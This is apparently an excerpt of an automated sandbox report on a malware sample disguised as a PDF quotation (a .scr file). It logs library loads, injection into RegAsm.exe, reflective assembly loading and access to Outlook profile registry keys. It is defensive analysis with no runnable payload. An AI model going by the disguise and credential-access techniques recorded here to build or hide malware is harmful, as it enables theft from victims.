              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic file information: File size 1103360 > 1048576
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.0000000004351000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2221779344.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.0000000004351000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2221779344.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6660000.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.43514f0.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: Yara matchFile source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.71f0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2226699586.0000000007212000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 7408, type: MEMORYSTR
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrCode function: 0_2_07B0233B push dword ptr [ebp-17000000h]; retf 0_2_07B02341
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FD822C push esp; ret 4_2_00FD822F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05046419 push dword ptr [ebp+eax-18h]; iretd 4_2_0504641D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05627CEE push ecx; iretd 4_2_05627CF5
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
